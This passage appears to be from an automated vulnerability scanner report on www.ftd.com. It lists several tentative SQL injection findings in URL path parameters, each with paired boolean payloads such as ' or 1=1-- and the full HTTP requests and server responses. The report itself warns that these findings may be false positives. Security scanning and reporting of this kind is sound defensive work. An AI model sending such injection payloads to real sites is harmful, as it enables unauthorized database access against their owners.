<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...
1.13. http://www.ftd.com/351/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16543645'%20or%201%3d1--%20 and 16543645'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35116543645'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:14:56 GMT
X-Varnish: 750185848
Age: 14
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 750185848</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35116543645'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:14:57 GMT
X-Varnish: 750186654
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...
1.14. http://www.ftd.com/351/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11294463'%20or%201%3d1--%20 and 11294463'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /351/favicon.ico11294463'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:16:47 GMT
X-Varnish: 540364982
Age: 16
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 540364982</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /351/favicon.ico11294463'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:16:48 GMT
X-Varnish: 540365912
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...
1.15. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/v20110407/ftd.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10658399'%20or%201%3d1--%20 and 10658399'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35110658399'%20or%201%3d1--%20/v20110407/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:14 GMT
X-Varnish: 729990668
Age: 21
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729990668</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35110658399'%20or%201%3d2--%20/v20110407/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:08:14 GMT
X-Varnish: 540338180
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...
1.16. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/v20110407/ftd.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 92130663'%20or%201%3d1--%20 and 92130663'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /351/v2011040792130663'%20or%201%3d1--%20/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:10:21 GMT
X-Varnish: 729997969
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729997969</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /351/v2011040792130663'%20or%201%3d2--%20/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:10:23 GMT
X-Varnish: 729998810
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...
1.17. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/v20110407/ftd.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 31033777'%20or%201%3d1--%20 and 31033777'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /351/v20110407/ftd.css31033777'%20or%201%3d1--%20?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:12:16 GMT
X-Varnish: 730004563
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 730004563</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /351/v20110407/ftd.css31033777'%20or%201%3d2--%20?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:12:17 GMT
X-Varnish: 750176867
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...
1.18. http://www.ftd.com/empty/index.epl [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/index.epl

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 73558935'%20or%201%3d1--%20 and 73558935'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /empty73558935'%20or%201%3d1--%20/index.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:01:20 GMT
X-Varnish: 869409209
Age: 10
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869409209</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /empty73558935'%20or%201%3d2--%20/index.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
